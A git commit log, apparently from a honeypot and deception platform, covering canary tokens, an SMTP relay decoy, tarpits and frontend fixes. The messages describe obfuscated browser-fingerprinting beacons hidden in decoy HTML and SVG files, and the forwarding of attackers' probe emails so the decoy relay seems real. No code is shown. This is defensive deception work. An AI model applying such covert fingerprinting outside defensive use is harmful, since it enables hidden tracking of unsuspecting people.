working-state function dict-based at its boundary. All production callers
(router handlers, mutator, CLI, heartbeat) migrated from dict/get access to
attribute access. 134 tests pass.
2026-04-30 23:51:41 -04:00
3456d3ab45 fix(models): Literal types on topology enum fields, hoist _MUTATION_OPS, top-level json import
MutationRow.op was str despite _MUTATION_OPS existing; Topology.mode/status,
TopologyDecky.state, TopologyMutation.op/state carried valid values only in
comments; deferred json import had no justification.

- Promote _MUTATION_OPS before table classes so table fields can reference it
- Add sa_column=Column(String) on each Literal-annotated table field to satisfy
  SQLModel 0.0.38 column-type inference
- Move import json to module top; remove deferred import inside _decode_json_payload
- MutationRow.op: str -> _MUTATION_OPS
2026-04-30 23:17:24 -04:00
3cb0203d07 fix(frontend): layout viewport selector, credentials tab order, Attackers.css shared import 2026-04-30 22:16:46 -04:00
eb34d0b1ea fix(event_kinds): remove probe_forwarded from INTERACTION_EVENT_TYPES 2026-04-30 22:16:11 -04:00
78d3e3a6b9 refactor(auth): hoist _CREDENTIALS_EXCEPTION constant, tighten JWT dependency chain 2026-04-30 22:16:06 -04:00
0b5228eb94 feat(config): add swarmctl-host to INI, env, CLI; drop hardcoded bind from systemd unit
[swarm] swarmctl-host → DECNET_SWARMCTL_HOST so operators set the bind
address once in decnet.ini; `decnet swarmctl` and the systemd unit both
resolve it via envvar — no --host/--port pinned on ExecStart.
2026-04-30 22:16:00 -04:00
57fecb8071 refactor(frontend): ApiError interface, tempIdSuffix rename, NET_GRID constants, extract onPaletteDrop handlers
ApiError: defined once in utils/api.ts, replaces 9 ad-hoc anonymous casts
across MazeNET, Inspector, DeckyFleet, SwarmHosts, Webhooks, PersonaGeneration,
ServiceConfigFields, CanaryTokens.

hex4 renamed to tempIdSuffix — the name now matches the comment that already
explained its purpose.

NET_GRID_{W,H,GAP,COLS} extracted from inline magic numbers to module-level
constants in MazeNET.tsx.

onPaletteDrop (130-line useCallback) split into three module-level handlers
(_dropNetwork, _dropArchetype, _dropService); the callback becomes a 10-line
router.
2026-04-30 22:14:20 -04:00
b754e9aa8b refactor(validate): move forwards_l3 overload explanation into check docstring
The 17-line block comment at _RULES was prose covering for a design wart.
The explanation belongs on the function itself — moved there and condensed.
_RULES now has a 2-line pointer instead of an essay.
2026-04-30 22:10:41 -04:00
402d6584ba fix(topology_store): use sqlite3.Row for named column access in current()
Row unpacking by positional index breaks silently on schema changes.
row_factory = sqlite3.Row gives named access with zero overhead.
2026-04-30 22:09:51 -04:00
9ad62d8177 fix(compose): name the topology_id prefix length constant
topology_id[:8] appeared twice with no explanation. 8 chars is the
git short-SHA convention; collision-safe within a single deployment's
network namespace.
2026-04-30 22:09:26 -04:00
eb7ccd0006 fix(reuse_worker): remove noqa: BLE001 (rule not in ruff select)
fix(generator): correct service pool count in _SVC_MIN/_SVC_MAX comment

BLE001 is not in ruff.toml select (F/ANN/RUF/E/W only); the suppressions
were whispering apologies to a linter that wasn't listening. Generator
comment now cites the actual ~28-entry non-singleton service pool.
2026-04-30 22:06:44 -04:00
17480093a9 refactor(topology_ops): decompose apply() into focused helpers
apply() was an 85-line function handling hash verification, validation,
superseding teardown, bridge/compose provisioning, and store persistence.
Extracted _check_hash_and_validate(), _teardown_superseded(), and _materialise()
so each step is independently readable and testable.
2026-04-30 21:56:48 -04:00
d1ed2701e7 refactor(generator): promote nested functions; rename used_combos to seen_service_pairs
_take_ip and _new_decky were closures capturing outer-scope state. Promoted to
module-level with explicit parameters. seen_service_pairs name makes the intent
clear — it prevents the same service frozenset from being assigned repeatedly.
2026-04-30 21:53:45 -04:00
07e6bafff8 fix(validate): narrow bare except to ImportError in psutil port-collision check
The original except Exception silently disabled port collision detection for
any runtime error — not just a missing package. Now only ImportError degrades
gracefully; real psutil failures propagate.
2026-04-30 21:53:05 -04:00
84e0ac4a43 fix(topology): cache IPAllocator host set; type repo params as BaseRepository
_host_set is computed once in __init__ — reserve() and is_free() were rebuilding
the full host frozenset on every call. BaseRepository already existed; the Any
annotations were just never updated.
2026-04-30 21:52:29 -04:00
257857338c fix(api): replace threading.Lock with asyncio.Lock for hydration guard
await inside a threading.Lock yields to the event loop while the OS
thread still holds the lock — potential deadlock under FastAPI thread
pool dispatch. asyncio.Lock is the correct primitive for async
critical sections. Also fixed stale diurnal.py docstring that had the
delegation direction backwards.
2026-04-30 21:24:11 -04:00
3fce597a70 docs(bodies): document intentional shared _body_canary in dispatch table 2026-04-30 21:19:07 -04:00
2629a8a0de fix(fake): rename prompt to _prompt, drop noqa suppression 2026-04-30 21:18:55 -04:00
a8c69155ff fix(planner): surface dropped weight entries in PUT /realism/config response
_parse_weights was silently dropping content_class values that don't
belong on their target list with no operator feedback. Changed it to
return (weights, dropped), apply_payload to collect and return all
dropped names, and put_config to include dropped_entries in the
response when non-empty.
2026-04-30 21:18:41 -04:00
8a40f6ced0 fix(personas_pool): re-stat after read to avoid caching stale mtime
The initial stat and read happened without a lock between them. A file
change mid-window stored the mtime of the pre-change stat against the
post-change content, suppressing the next reload. Re-stat after
read_text; fall back to the pre-read stat only on OSError.
2026-04-30 21:17:50 -04:00
1e1c92abc3 fix(bodies): type make_body_with_llm persona parameter via TYPE_CHECKING
The persona arg was typed Any to avoid a circular import. Added a
TYPE_CHECKING guard to import EmailPersona annotation-only so mypy
has the type without a runtime import cycle.
2026-04-30 21:17:26 -04:00
ebe15310ab fix(api): hydrate planner from DB exactly once on first GET, not on every read
get_config was calling planner.apply_payload on every GET request, racing
concurrent reads on module-level globals. Added a _hydrated flag + lock
so DB hydration runs at most once per process lifetime; put_config marks
it done too. Test fixture resets the flag between tests.
2026-04-30 21:17:03 -04:00
c7fcd86be4 fix(planner): guard apply_payload and reset_to_defaults with a lock
Concurrent PUT requests could observe a half-updated planner between
the four sequential global assignments. Added _planner_lock so the
rebind is atomic; same lock wraps reset_to_defaults.
2026-04-30 21:15:12 -04:00
f597d70430 fix(realism): use minute-precision datetime in in_active_hours
personas.in_active_hours was discarding the minute component of the
active-hours window, making "09:30-17:45" behave as "09:00-17:00".
Rewrote it to delegate to diurnal.in_work_hours (which uses full
minute arithmetic) and updated the scheduler caller to pass the full
datetime instead of now_dt.hour.
2026-04-30 21:14:36 -04:00
f6422f2529 fix(heartbeat): replace remaining bare except Exception with SQLAlchemyError and typed builtins 2026-04-30 21:08:26 -04:00
542d129d6f refactor(services_live): replace string-sniffed error dispatch with typed exception subclasses
ServiceNotFoundError (→ 404) and ServiceConflictError (→ 409) replace the
"not found" / "already on" / "not on" substring checks in _map_mutation_error;
base ServiceMutationError still maps to 422. Fixes three pre-existing test
status-code assertions (201 vs 200 on POST endpoints).
2026-04-30 20:49:29 -04:00
a5487eb55f refactor(enroll-bundle): extract bundle_builder and move DTOs to swarm models
Pure tarball construction (_build_tarball, _render_*, _iter_included,
_SYSTEMD_UNITS) moved to decnet/swarm/bundle_builder.py — no FastAPI
dependency, independently testable. EnrollBundleRequest/Response moved
to decnet/web/db/models/swarm.py alongside the other swarm DTOs.
Router drops from 504 to 260 lines; keeps only the in-memory token
registry, sweeper, and endpoints.
2026-04-30 20:39:42 -04:00
e124f9e296 refactor(swarm): extract _shard_payload helper and promote _dispatch to module-level 2026-04-30 20:25:38 -04:00
c648d8b04e fix(heartbeat): replace bare except Exception with specific types and intent comments 2026-04-30 20:19:52 -04:00
72498f81b2 fix(ui): surface attacker date_hdr in mail table and drawer
MailDrawer was reading fields.date / from_addr / message_id —
all wrong; actual log field names are date_hdr, from_hdr,
message_id_hdr, to_hdr.  The mail table in AttackerDetail
showed only DECNET capture time and used from_addr instead
of from_hdr.  Add a DATE (attacker) column so the attacker-
supplied Date header (including timezone) is visible at a
glance — useful for correlating campaigns like the Tiscali
run where IPs used distinct TZs (+0800 vs -0700).
2026-04-30 14:11:08 -04:00
d0b07bdf52 fix(smtp_relay): inject From: header if absent so attacker address shows in client
Relay-test scripts send minimal DATA with no headers. Without a From:
header the mail client falls back to displaying the envelope sender
(upstream_sender). Inject From: <attacker MAIL FROM> before forwarding
when the message has no existing From: header.
2026-04-30 12:43:41 -04:00
4d12fb6a03 fix(smtp_relay): upgrade to STARTTLS before AUTH if server advertises it
Servers like mail.resacachile.cl only expose AUTH after STARTTLS. Issue
starttls() + re-ehlo() when the server advertises the extension.
2026-04-30 12:40:17 -04:00
633594b110 fix(smtp_relay): use correct async-for bus subscription in probe listener
bus.subscribe() is sync and returns an async iterator, not a coroutine.
Awaiting it caused an immediate crash at startup; bus.next_message() does
not exist either. Rewrote _run_smtp_probe_listener to use the standard
pattern: sub = bus.subscribe(...) / async with sub / async for event in sub.
2026-04-30 12:35:45 -04:00
761c23a07c fix(smtp_relay): emit service=smtp_relay in syslog so ingester can gate probe publish
SERVICE_NAME was hardcoded to 'smtp' in server.py; the ingester's probe
publish guard checked service == 'smtp_relay' and never matched.

Read SMTP_SERVICE_NAME from env (default 'smtp'); smtp_relay compose
fragment sets it to 'smtp_relay' so the two services are distinguishable.
2026-04-30 12:31:29 -04:00
f0d47c5195 fix(smtp): chmod quarantine dir before dropping to logrelay
The bind-mounted quarantine dir is owned by the host decnet user; the
logrelay process had no write access because the Dockerfile USER directive
pre-applied before the entrypoint could fix permissions.

Run entrypoint as root, chmod 0777 the quarantine dir, then exec the
server under logrelay via su.
2026-04-30 12:25:37 -04:00
8ae7b9636e feat(smtp_relay): move probe forwarding to realism worker via bus
Attacker probe emails are now forwarded by the master (realism worker)
rather than inside the MACVLAN container, which has no internet gateway.

- New smtp.probe.pending bus topic: ingester publishes when smtp_relay
  message_stored fires; worker subscribes and does the actual delivery
- decnet/orchestrator/drivers/smtp_relay.py: pure-sync forward_probe()
  reads the .eml from disk and sends via smtplib on a thread executor
- worker.py: _run_smtp_probe_listener + _handle_probe_pending subtask;
  limit enforced via count_probe_relays() (DB-backed, restart-safe)
- bounties.py: count_probe_relays() query on probe_relay bounty type
- fleet.py: get_fleet_decky_by_name() to pull service config from DB
- services/smtp_relay.py: upstream_* and probe_limit fields defined in
  config_schema but NOT injected into container env (credentials stay
  out of docker env vars)
- ingester.py: stripped of smtplib; publishes probe.pending and exits
- tests: assert upstream keys absent from container environment
2026-04-30 12:10:58 -04:00
4c0a1309f0 fix(smtp_relay): log upstream error reason in probe_forwarded event
forwarded=0 was silent — now fwd_error carries the exception string so
you can see exactly why the upstream refused (auth failure, connection
refused, timeout, etc).
2026-04-30 11:57:07 -04:00
c78ba6f698 fix(deploy): pre-remove container by name before force-recreate
Docker Compose tracks the previous container by internal ID. When that
container was already removed or renamed, --force-recreate fails with
"No such container". Remove by name first so Compose always starts clean.
2026-04-30 11:54:00 -04:00
fdf38a9d8c feat(smtp_relay): add upstream_sender to fix SPF on probe forwarding
Override the envelope MAIL FROM with a domain we own when talking to the
upstream relay. SPF passes at the recipient; the attacker's From: header
inside the message body is untouched so they see their own address in their
inbox and believe the relay is real.
2026-04-30 11:47:18 -04:00
24cdef9246 feat(smtp_relay): ingest probe_forwarded as probe_relay bounty
Adds probe_forwarded to meaningful event kinds and stores it in the
bounty table as bounty_type=probe_relay with forwarded=true/false, so
the dashboard shows whether the upstream actually accepted the test email.
2026-04-30 11:32:14 -04:00
9a4fe2677b feat(smtp_relay): forward probe emails upstream so attackers verify relay works
First SMTP_PROBE_LIMIT messages per source IP are forwarded via a real
upstream relay (SMTP_UPSTREAM_HOST/PORT/USER/PASS) so the attacker's
test email actually lands in their inbox. All subsequent messages from
the same IP get 250 Ok but only hit the quarantine — campaign content
captured, nothing delivered.
2026-04-30 11:21:04 -04:00
4b7cb42ab1 fix(profiler): extract commands when MSGID=command, not just MSGID=NIL
The Dockerfile PROMPT_COMMAND logger uses --msgid command, so the MSGID
field arrives as 'command' not '-'. The CMD rewrite block was guarded by
event_type == '-' so it never fired, leaving fields['command'] unpopulated
and cmd_text=None for every SSH session command.

Broaden the guard to also match event_type == 'command' with no existing
'command' field, which covers both the intended (MSGID=NIL) and actual
(MSGID=command) wire formats.
2026-04-30 10:57:29 -04:00
bbb1762250 fix(export): one attacker per line in exported JSON 2026-04-30 10:45:03 -04:00
2ddba04f79 feat(attackers): add JSON export endpoint and download button 2026-04-30 10:43:46 -04:00
f0756dcdec fix(ui): use overflow: clip on dash panels so inner scrollbars aren't masked 2026-04-30 00:34:40 -04:00
18393f1e1c fix(ui): bound dashboard height so panels don't overflow viewport
.content-viewport is overflow-y: auto so flex:1 on dash-grid grew to
content height. Fix: dashboard uses height:100% instead of min-height,
and :has(>.dashboard) disables content-viewport scroll only on that
route — all other pages keep their normal scroll.
2026-04-30 00:32:16 -04:00
9ed0094045 fix(ui): reset live feed scroll to top on log update
Sticky thead was floating mid-content when the container auto-scrolled
as new log entries arrived. Pinning scrollTop to 0 on each logs update
keeps the thead at position 0 where it belongs.
2026-04-30 00:30:46 -04:00
fca0953439 fix(ui): dashboard grid fills available viewport height
Use flex: 1 on dash-grid instead of height: 480px so the panels
consume all remaining space below the stat cards; dash-side uses
height: 100% to fill its grid cell
2026-04-30 00:27:47 -04:00
b364c41736 fix(ui): dashboard panel heights + missing icon
- Use height: 480px on .dash-grid so both columns are the same height;
  side panels split that height via flex instead of their own max-height
- Add LayoutDashboard icon to the DASHBOARD page header
2026-04-30 00:24:27 -04:00
fbc9877ef2 fix(ui): follow-up polish — icons, dashboard bar, filter redesign, bounty/creds sort
- Dashboard: fix invisible bar at bottom of LIVE FEED by constraining
  max-height on the section instead of the inner container; same fix
  for side panels
- Page icons: add violet-accent icon beside h1 on all 9 missing pages
  (CanaryTokens, RealismConfig, SyntheticFiles, PersonaGeneration,
  Attackers, Webhooks, LiveLogs, Topologies, DecoyFleet)
- Attackers filter chips: replace ad-hoc chip buttons with seg-group
  tabs (ALL / ACTIVE N / PASSIVE N / INACTIVE N) matching Credential
  Vault style; country chips use same seg-group treatment
- Credential Vault: add sortable headers to REUSE tab (LAST SEEN,
  PRINCIPAL, KIND, TARGETS, ATTEMPTS); reuses same SortTh pattern
- Bounty: remove CREDENTIALS and PAYLOADS tabs; keep ALL, ARTIFACTS,
  FINGERPRINTS; add EMAIL (artifact subtype, filtered client-side)
2026-04-30 00:20:25 -04:00
9adee07d21 feat(ui): frontend polish sweep — 8 UX fixes
- DeckyFleet: card click opens inspect side-drawer instead of
  auto-filtering (localSearch filter behavior removed)
- Dashboard: LIVE FEED / DECKIES UNDER SIEGE / TOP ATTACKERS panels
  now have fixed max-height with overflow scroll instead of growing
- parseEventBody: defensive RFC 5424 header strip so raw syslog lines
  from the collector render as k=v pills instead of raw text
- Attackers: search placeholder updated; activity (Active/Passive/
  Inactive) and country chip filters added on top of existing IP search
- Credentials + Bounty: sortable column headers (click to asc/desc/clear)
- SwarmHosts + RemoteUpdates: icon extracted from <h1> into flex div
  with violet-accent class, matching site-wide Identities pattern
- Swarm.css: fix --panel-border undefined variable → --border so the
  title border-bottom line is visible on SwarmHosts and RemoteUpdates
2026-04-29 23:56:38 -04:00
a322d88b3c fix(tarpit): resolve topology container name in watcher before PID lookup 2026-04-29 21:14:21 -04:00
917f7e8e54 feat(tarpit): MazeNET topology-scoped tarpit — Inspector controls + topology API 2026-04-29 21:10:02 -04:00
f84c66cf9b feat(ui): tarpit controls on DeckyCard — three-dot dropdown + enable/disable 2026-04-29 20:56:51 -04:00
07b32e2abe fix(tests): patch add_service/remove_service at the router import, not the module
Monkeypatching services_live.add_service had no effect because api_services
already held a local reference to the name. Patch api_services.add_service
and update fake stubs to accept the config kwarg added to the real signature.
2026-04-29 18:50:21 -04:00
5f4005c47a feat(tarpit): port-selective tc netem tarpit mode with live log events
- GET/POST/DELETE /api/v1/deckies/{name}/tarpit (admin write, viewer GET)
- get_container_veth() + get_container_pid() in network.py via iflink/ip-link
- TarpitRule SQLModel table + TarpitMixin repo (upsert/get/delete/list)
- Background tarpit_watcher_worker: polls /proc/{pid}/net/tcp every 15s,
  emits tarpit_enter/tarpit_exit log events (edge-triggered, with duration)
- tarpit_enabled/tarpit_disabled logs on operator POST/DELETE actions
2026-04-29 18:49:42 -04:00
2fc5f1bdc5 feat(canary): auto-deregister fingerprint slug after first valid beacon
Once a fingerprint canary's HTTP beacon passes all 4 validation layers
and the trigger row lands, the token is immediately set to state=revoked
and canary.<id>.revoked is published on the bus. The slug lookup is
tightened to only return planted tokens, so subsequent requests to the
same URL silently return the transparent GIF without persisting anything
(stealth posture preserved). Plain http/dns canaries with no
fingerprint_nonce are not affected.

Changes:
- sqlmodel_repo/canary.py: add state == "planted" filter to
  get_canary_token_by_slug so revoked slugs resolve to None
- worker.py: after record_canary_trigger, if parsed_fp survived all
  layers and token has a fingerprint_nonce, call
  update_canary_token_state("revoked") + publish CANARY_REVOKED; errors
  are best-effort (trigger row already landed)
- test_worker_http.py: assert state=revoked in test_fp_valid_nonce_persists;
  new test_fp_deregisters_slug_after_valid_hit (second hit records nothing);
  new test_plain_http_canary_not_deregistered (env_file stays planted)
2026-04-29 17:49:31 -04:00
b26dd8f529 feat(canary): API-trashing defense — 4-layer fingerprint validation
Adds per-mint nonce gating, structural shape validation, mint UUID
consistency checks, and a per-(token, IP) rate limiter to the canary
worker so attackers who extract a canary from a decky filesystem cannot
poison fingerprint forensics by replaying or forging ?d= submissions.

Changes:

base.py
  fingerprint_nonce: Optional[str] added to CanaryArtifact so generators
  can surface the nonce to the cultivator without coupling the generator
  directly to DB code.

obfuscator.py
  nonce_for(callback_token, mint_uuid): HMAC-SHA256 keyed on
  DECNET_CANARY_FINGERPRINT_SECRET, truncated to 16 hex chars.
  FingerprintSecretMissing raised at mint time if env var is unset.
  render_fingerprint_js() now accepts nonce= and substitutes MINT_NONCE.

fingerprint_payload.js
  New MINT_NONCE placeholder. Appended as &k= on all beacon URLs (bare-open,
  single-shot, chunked). Using &k= avoids colliding with &n= (chunk total).

fingerprint_html.py / fingerprint_svg.py
  Derive nonce via nonce_for() and pass to render_fingerprint_js(). Set
  artifact.fingerprint_nonce so the cultivator can persist it.

cultivator.py
  Passes fingerprint_nonce into create_canary_token() when present on the
  artifact; NULL for all non-fingerprint generators.

canary.py (model)
  fingerprint_nonce: Optional[str] = Field(default=None, max_length=16)
  added to CanaryToken. None for non-fingerprint tokens.

worker.py
  _extract_fingerprint now returns (meta_dict, parsed_fp) tuple.
  _record_hit accepts parsed_fp + raw_nonce and runs 4 layers after
  token lookup: nonce match, shape check, mint UUID consistency, rate limit.
  Each failure sets _fp_invalid_* flag and drops structured _fp.
  Trigger row always lands regardless.

tests/canary/conftest.py
  Session-scoped autouse fixture sets DECNET_CANARY_FINGERPRINT_SECRET so
  fingerprint generator and worker tests work offline.

tests
  5 new worker HTTP tests and 2 new generator tests covering each
  validation layer.
2026-04-29 17:41:04 -04:00
f86dc79990 feat(canary): ship Node helper with wheel + install-toolchain CLI
The fingerprint canaries' obfuscator shells out to a Node helper that
require()s javascript-obfuscator. Without this commit, a fresh
pip install decnet would land the .py modules but not the .js helper /
package.json, and there'd be no documented way to provision Node side.

* pyproject.toml - extend tool.setuptools.package-data to ship
  canary/_obfuscate_helper.js, canary/fingerprint_payload.js, and
  canary/package.json with the wheel.
* decnet/cli/canary.py - new "decnet canary-install-toolchain"
  subcommand. Resolves decnet.canary.__file__'s dir, runs
  npm install --omit=dev there, exits non-zero with a clear message
  if npm is missing or install fails. Idempotent - safe to call
  every API service start.
* deploy/decnet-api.service.j2 - non-fatal ExecStartPre that calls
  the new subcommand. Leading '-' so a missing Node toolchain only
  degrades fingerprint canaries (loud at mint time) without keeping
  the API from booting.
* tests/canary/test_cli.py - registration smoke test, missing-npm
  exit path, and a mocked-subprocess test asserting the right argv
  and cwd land on npm.

Realism cultivator already has a broad except Exception around
cultivate() in scheduler.py:195-211, so a missing toolchain on a
host running the realism tick degrades to an inert noise file with
no extra plumbing.
2026-04-29 16:53:27 -04:00
907ade9142 feat(realism): wire fingerprint_html/svg through taxonomy + UI
The two new fingerprint canary generators existed at the API level
since f64e78f but weren't visible to the realism engine or the
operator-facing dashboard. Threads them through every place that
enumerates canary content classes.

Backend:
* realism/taxonomy.py - two new ContentClass members
  (CANARY_FINGERPRINT_HTML, CANARY_FINGERPRINT_SVG); enum is
  wire-visible (synthetic_files.content_class column + bus discrim)
  so we add at the bottom, never reorder.
* canary/cultivator.py - class-to-generator dispatch, kind mapping
  (both http), and default placement paths
  (~/Documents/asset_directory.html and network_topology.svg).
* realism/naming.py + bodies.py - _name_canary / _body_canary entries.
* realism/planner.py - added to _DEFAULT_CANARY_CLASS_WEIGHTS and
  the _CANARY_CLASSES classification set.

Frontend:
* decnet_web/src/realism/labels.ts - display labels.
* decnet_web/src/components/RealismConfig/RealismConfig.tsx - default
  canary weight rows so operators see them in the realism config UI.
* decnet_web/src/components/SyntheticFiles/SyntheticFiles.tsx - added
  to the CONTENT_CLASSES allow-list so filter dropdowns show them.

Also: re-applied the nosec B404/B603 markers on canary/obfuscator.py;
the first commit's pre-commit autoformatter stripped them.

Tests: extended tests/realism/test_taxonomy.py's stability assertion
to include the two new values. Full canary + realism suites pass
(362 / 2 skipped).
2026-04-29 16:44:03 -04:00
de6d5cd1a8 fix(canary): include fingerprint_* in KNOWN_GENERATORS stability test 2026-04-29 16:26:09 -04:00
dd807bc55e feat(canary): worker decodes ?d=/?o=/?s=&i=&n=&d= fingerprint params
The fingerprint payload beacons fingerprint data as base64url JSON in
GET query params: ?o=1 for the bare-open beacon, ?d=<blob> for a
single-shot dump, or ?s/i/n/d=<chunk> for chunked dumps. Until now
those params were buried inside request_path; consumers had to parse
the URL themselves.

Worker now extracts them in _extract_fingerprint and merges into
raw_headers under reserved _fp* keys:

* _fp_open       — bare-open marker
* _fp            — decoded fingerprint dict (single-shot path)
* _fp_sid/idx/total/chunk — chunked metadata + raw base64 (reassembly
  is a downstream concern, not the worker's job)
* _fp_decode_error / _fp_oversize — failure markers for trash dumps

Per-chunk size capped at 8KB so an attacker spamming /c/<known_slug>
can't inflate trigger rows indefinitely. Decode failures degrade
gracefully — the trigger row still records the hit, just with a
_fp_decode_error flag instead of structured fingerprint data.

Tests cover the single-shot decode, bare-open flag, chunked metadata,
malformed input, and oversize drop paths.
2026-04-29 16:25:17 -04:00
f64e78f78c feat(canary): fingerprint_html + fingerprint_svg generators
Two new synthesised-artifact generators that bake the obfuscated
fingerprint payload into plausible-looking decoy files:

* fingerprint_html — a mundane "Internal Asset Directory" page with a
  small table of fake hosts; the obfuscated payload is inlined at the
  bottom of <body>. Visible content (row pool slice, sync timestamp)
  also varies per mint via SHA-256-derived stable ints, so two
  extracted canaries don't diff to zero even on the rendered surface.
* fingerprint_svg — standalone SVG with an embedded <script> CDATA
  block. SVG <script> only fires for top-level loads / <object> /
  <iframe>; <img>-referenced renders are safely inert.

Both derive the mint UUID via uuid.uuid5 from the callback token, so
re-mints are byte-identical (preserving the generator determinism
contract) AND the same token produces the same mint UUID across HTML
and SVG variants — the worker can correlate beacons across artifact
shapes.

Wired into the factory + KNOWN_GENERATORS, default placement paths
under ~/Documents/asset_directory.html and ~/Documents/network_topology.svg
for both linux and windows personas. Tests cover determinism, per-token
divergence, structural validity (DOCTYPE/SVG headers), and that the
beacon URL stays inside the obfuscated string array (not in plaintext).
The two new entries skip in test_generators.py when Node toolchain is
absent so bare CI checkouts still pass.
2026-04-29 16:22:18 -04:00
12cd7ad9cb feat(canary): per-mint JS obfuscator wrapper + fingerprint payload
Adds the load-bearing primitives for obfuscated browser-fingerprinting
canaries. Step 3 (HTML/SVG generators) and step 4 (worker-side
fingerprint ingestion) build on top of these.

* decnet/canary/obfuscator.py - javascript-obfuscator wrapper. Seed
  and polymorphic config bits both derive from the callback token, so
  output is byte-identical for the same mint (preserving the generator
  determinism contract from base.py) and structurally distinct across
  mints.
* decnet/canary/fingerprint_payload.js - port of canary-self-test.html
  with the rendering UI stripped. Two placeholders (BEACON_URL,
  MINT_UUID) substituted before obfuscation. MVP beacon strategy:
  bare-open GET pixel first, then base64url-encoded fingerprint as
  query params on subsequent GETs (chunked above ~6KB) so the existing
  worker records hits before step-4 lands.
* decnet/canary/_obfuscate_helper.js - Node subprocess helper that
  reads code+options JSON from stdin and writes obfuscated JS to
  stdout. Vendored javascript-obfuscator under decnet/canary/.
* tests/canary/test_obfuscator.py - determinism, per-mint divergence,
  template substitution, Node syntax check, error path.
2026-04-29 16:16:37 -04:00
eefab020d4 fix(swarm): propagate service mutations to worker agent via shard re-dispatch
Add/remove/update_config on a fleet decky living on a swarm worker — and on
an agent-pinned topology — used to run the master's local docker-compose only,
which has no containers for the remote decky. The mutation persisted on master
and silently no-op'd on the worker.

- Fleet swarm: lookup DeckyShard.host_uuid; if found, rebuild a single-host
  shard from master state and call dispatch_decnet_config — same proven path
  as POST /swarm/deploy. Skip local _compose (no containers to touch).
- Topology agent-pinned: call decnet.engine.deployer.resync_agent_topology
  (existing helper) to push the latest hydrated blob to the worker.
- Local-only deckies: behaviour unchanged.
- Tests: 5 new in tests/engine/test_services_live_swarm.py covering all
  three mutations on a swarm fleet decky (no local _compose, dispatch fires
  with the right host's deckies), plus apply=False save-only path (no
  dispatch), plus regression that local-only fleet add still runs local compose.

Bus signal `decky.{name}.service_config_changed` keeps publishing as an
audit trail; it is not the propagation trigger.
2026-04-29 12:51:16 -04:00
94b06ee862 feat(services): initial config on ADD SERVICE — schema modal in DeckyCard, MazeNET drag, and Inspector
- DeckyServiceAddRequest gains an optional `config: dict` field, validated
  against the service's config_schema before any state mutation (400 on
  bad type, no half-written rows).
- Engine: add_service threads `config` into _add_topology_service /
  _add_fleet_service, persisting validated cfg to decky_config.service_config
  BEFORE compose regen so the first `up -d --build` materialises the env on
  the new container. No follow-up apply needed.
- Frontend: shared AddServiceConfigModal — same wizard accordion shape, used by:
    * DeckyCard's ADD SERVICE picker (Fleet & MazeNET inspectors via shared component)
    * MazeNET Inspector's ADD SERVICE picker
    * MazeNET palette drag-drop onto a deployed decky
  Empty-schema services short-circuit to a one-click add (no modal flash).
  Operator can cancel; errors surface in the modal.
- Tests: add_service config plumbing — persist, drop unknown keys, 400-equivalent
  on bad types, back-compat empty-config.
- Drive-by: fix stale repo-method names in test_services_live.py
  (create_topology_decky → add_topology_decky, get_topology_decky → list+pick helper,
  service.added → service_added topic).
2026-04-29 12:44:47 -04:00
77ceb9d6f3 feat(services): config schemas for the rest of the registry + textarea base64 transport
- Declarative config_schema on RDP, Telnet, MySQL, Redis, SMTP, SMTP_Relay
  matching the keys each service already reads at compose time.
- TODO marker on the 19 services that accept service_cfg but never read it,
  so future contributors know where to plug schemas in.
- Wizard base64-wraps all textarea values at INI emit (DeckyFleet
  buildIni); validate_cfg detects the b64: sentinel and decodes back to
  UTF-8. Plain raw strings still pass through for direct API submitters.
- HTTPS image entrypoint accepts PEM content or path in TLS_CERT/TLS_KEY:
  detects a BEGIN header, writes content to /opt/tls/, and re-exports
  the on-disk path so server.py keeps reading paths.
- Tests cover schema/compose alignment for each new service plus
  textarea base64 round-trip (incl. UTF-8) and HTTPS PEM end-to-end.
2026-04-29 12:23:56 -04:00
d8fa7cc73d feat(ui): per-service config in the deploy wizard's CONFIGURATION step
Setting a password, banner or TLS material AFTER deployment forces a
container recreate on every change. The deploy wizard now lets the
operator set service config up-front so the initial build has the
right env from the start.

Mechanics:
- Extracted the schema-driven field rendering out of ServiceConfigForm
  into a standalone ServiceConfigFields component (no API/buttons,
  just inputs + onChange).  ServiceConfigForm now delegates to it.
- Wizard step 2 (CONFIGURATION) renders one accordion block per
  selected service; clicking a service reveals its schema-driven
  inputs and a 'N set' badge tracks how many overrides are populated.
  Removing a service (back to step 1) drops its config so the INI
  doesn't carry orphans.
- _buildIni emits one [<prefix>.<svc>] group subsection per service
  with at least one override.  The INI loader's prefix-matcher
  applies it to every ${prefix}-NN decky in the batch, so one block
  covers all clones.
- Multi-line string values (PEM textareas etc.) are escaped as \n
  on the way into INI; downstream consumers re-expand.
2026-04-29 12:08:17 -04:00
97260daf8d fix(ui): make .info-banner usable inside the deploy-wizard modal
PersonaGeneration.css scopes .info-banner under .persona-gen-root,
which doesn't match elements rendered inside the Modal portal —
so the wizard's CONFIGURATION-step banner I just added rendered
as plain text.

Add a page-unscoped .info-banner rule in DeckyFleet.css with the
same visual treatment (faint bg, violet left rule) so any modal
context picks it up.
2026-04-29 12:01:42 -04:00
8d3f5c646a fix(network): accept CAP_NET_ADMIN in lieu of euid==0 for macvlan setup
The systemd unit grants AmbientCapabilities=CAP_NET_ADMIN so the API
service can program host-side macvlan/ipvlan interfaces without
running as root, but setup_host_macvlan/_ipvlan rejected with euid!=0
before even trying — making web-driven 'decnet deploy' impossible
under the privilege model the unit advertises.

Replace _require_root with _require_net_admin, which reads CapEff
from /proc/self/status and accepts the cap (bit 12) as well as
euid==0. No libcap dep — pure /proc parse.
2026-04-29 11:56:40 -04:00
5912608f78 fix(ui): wizard CONFIGURATION step + drop bogus --archetype custom preview
The CONFIGURATION step had a stale disabled placeholder textarea
("per-service overrides") from before the schema-driven Inspector
landed. Replaced with a one-line info banner pointing at the Inspector,
which is now where per-service config actually lives.

The DEPLOY step's CLI preview was rendering '--archetype custom' when
pickMode==='services', but no such archetype is registered — only the
preset archetypes plus 'services' (free-form list). Drop the
--archetype line entirely in the services-mode preview so the rendered
command reflects what the API actually receives.
2026-04-29 11:56:29 -04:00
ba0e7ca476 style(ui): rebuild ServiceConfigForm in inspector terminal vocabulary
Previous CSS lived in DeckyFleet.css only, so when the form rendered
inside MazeNET Inspector the inputs fell back to browser defaults
(white-on-white, oversized labels, mismatched buttons).

New ServiceConfigForm.css ships with the component itself: small
uppercase tracking-1 labels at 0.6rem (matches kvs .k), dark
transparent inputs with violet focus, matrix-green text inside
inputs, custom select chevron, dedicated svc-cfg-btn that visually
mirrors maze-btn.small, password reveal toggle, and a 96px label
